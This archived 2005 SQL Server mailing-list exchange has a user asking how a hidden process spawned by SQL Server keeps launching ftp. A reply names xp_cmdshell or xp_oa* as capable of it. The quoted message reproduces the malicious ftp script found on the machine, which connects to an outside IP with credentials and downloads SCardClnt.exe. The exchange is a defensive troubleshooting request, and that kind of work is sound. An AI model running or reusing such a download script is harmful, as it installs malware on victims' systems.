RE: malicious process...
From: Mike Epprecht (SQL MVP) (mike_at_epprecht.net)
Date: 04/28/05
- Next message: Alex: "Urgent question SQL Server"
- Previous message: François G.: "malicious process..."
- In reply to: François G.: "malicious process..."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 28 Apr 2005 04:42:02 -0700
Hi
xp_cmdshell or xp_oa* are capable of doing this.
Regards
--------------------------------
Mike Epprecht, Microsoft SQL Server MVP
Zurich, Switzerland
MVP Program: http://www.microsoft.com/mvp
Blog: http://www.msmvps.com/epprecht/
"François G." wrote:
> Hi,
>
> Since I installed a firewall on my machine, it regularly
> detects unexpected ftp sessions.
>
> Thanks to a process explorer, I remarked that ftp is
> launched from a (hidden) cmd.exe, itself lauched by
> sql.exe (for your info, the ftp command line is : "ftp -n -
> s:???.txt" where ???.txt is a textfile in \system32\ ).
>
> What SQL subsystem is able to launch such a process? a
> stored procedure? a trigger? (fyi, SQLAgent is not
> running). How can I prevent this to occur?
>
> Thank you for your help,
>
> François
>
>
> Note - contents of the textfile :
>
> open 81.244.183.229 19470
> user itqavjflw itqavjflw
> get SCardClnt.exe
> quit
>
>
- Next message: Alex: "Urgent question SQL Server"
- Previous message: François G.: "malicious process..."
- In reply to: François G.: "malicious process..."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
